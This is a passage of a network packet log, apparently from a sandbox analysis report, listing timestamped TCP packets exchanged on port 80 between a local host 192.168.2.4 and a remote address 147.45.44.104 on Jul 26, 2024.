Jul 26, 2024 18:56:39.278597116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.278623104 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.278647900 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.279149055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.279190063 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.279273033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.279284954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.279298067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.279309988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.279316902 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.279347897 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.280116081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.280131102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.280144930 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.280159950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.280163050 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.280184031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.280190945 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.280198097 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.280210018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.280220985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.280221939 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.280241013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.280256987 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.280963898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.280977011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.280987978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.281006098 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.281033039 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.281173944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.281186104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.281198025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.281212091 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.281243086 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.281771898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.281790972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.281799078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.281811953 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.281860113 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.281904936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.281917095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.281929970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.281954050 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.281970978 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.283122063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.283133984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.283144951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.283188105 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.283226013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.283303976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.283317089 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.283328056 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.283341885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.283344984 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.283375025 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.283520937 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.283533096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.283545017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.283555984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.283560038 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.283570051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.283581972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.283591032 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.283593893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.283607006 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.283618927 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.283618927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.283638000 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.283654928 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.284858942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.284872055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.284883976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.284894943 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.284909010 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.284940958 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.368217945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.368236065 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.368247986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.368258953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.368271112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.368282080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.368294954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.368329048 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.368380070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.368391991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.368402958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.368416071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.368427038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.368438959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.368451118 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.368463039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.368474960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.368518114 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.368518114 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.368518114 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.368518114 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.368518114 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.368695021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.368706942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.368720055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.368722916 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.368732929 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.368733883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.368747950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.368765116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.368767977 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.368794918 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.368818998 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.368844986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.368863106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.368874073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.368885040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.368891954 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.368897915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.368911028 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.368937969 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.369004011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369016886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369026899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369040012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369040966 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.369054079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369066954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369067907 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.369080067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369091988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369095087 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.369107008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369113922 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.369122028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369132042 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.369138002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369162083 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.369189024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.369472980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369484901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369497061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369508982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369510889 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.369522095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369529963 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.369534016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369546890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369559050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369561911 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.369580030 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.369606018 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.369788885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369801044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369820118 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369828939 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.369829893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369843006 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369848013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.369856119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369867086 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.369868994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369884014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369894981 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.369894981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369908094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369913101 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.369920969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369932890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369945049 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.369945049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369959116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.369971037 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.369991064 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.371320009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.371331930 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.371344090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.371372938 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.371387959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.371400118 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.371400118 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.371414900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.371428013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.371428013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.371462107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.371525049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.371537924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.371550083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.371562958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.371563911 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.371592999 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.371617079 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.371822119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.371834040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.371845007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.371855974 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.371865988 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.371887922 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.371896029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.371908903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.371912003 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.371922970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.371934891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.371942043 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.371948957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.371973038 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.371990919 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.372375965 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.372386932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.372397900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.372409105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.372414112 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.372440100 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.372519016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.372529984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.372539997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.372558117 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.372559071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.372575998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.372585058 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.372586966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.372600079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.372610092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.372612953 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.372622013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.372632980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.372633934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.372647047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.372648954 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.372658014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.373146057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.373157024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.373168945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.373169899 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.373169899 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.373181105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.373184919 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.373200893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.373209000 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.373217106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.373229027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.373238087 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.373256922 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.373282909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.373728991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.373788118 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.477019072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.477081060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.477092981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.477103949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.477118969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.477179050 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.477233887 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.477360010 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.477372885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.477385044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.477400064 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.477428913 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.477492094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.477504969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.477516890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.477529049 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.477530956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.477552891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.477555990 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.477566004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.477576971 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.477602005 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.477783918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.477797031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.477808952 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.477819920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.477823973 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.477833986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.477844954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.477854013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.477858067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.477875948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.477895975 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.478075981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.478086948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.478099108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.478110075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.478112936 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.478128910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.478141069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.478141069 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.478159904 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.478177071 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.478192091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.478204012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.478214025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.478225946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.478226900 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.478238106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.478249073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.478255987 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.478260040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.478272915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.478277922 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.478286982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.478306055 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.478327036 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.478791952 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.478806019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.478816986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.478828907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.478831053 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.478842020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.478853941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.478873014 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.478883028 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.478893042 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.479264021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.479276896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.479289055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.479300976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.479309082 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.479314089 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.479326963 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.479334116 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.479338884 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.479353905 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.479358912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.479371071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.479377985 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.479382992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.479392052 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.479396105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.479408026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.479418039 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.479420900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.479433060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.479437113 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.479444981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.479455948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.479465008 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.479468107 CEST	80	49757	147.45.44.104	192.168.2.4
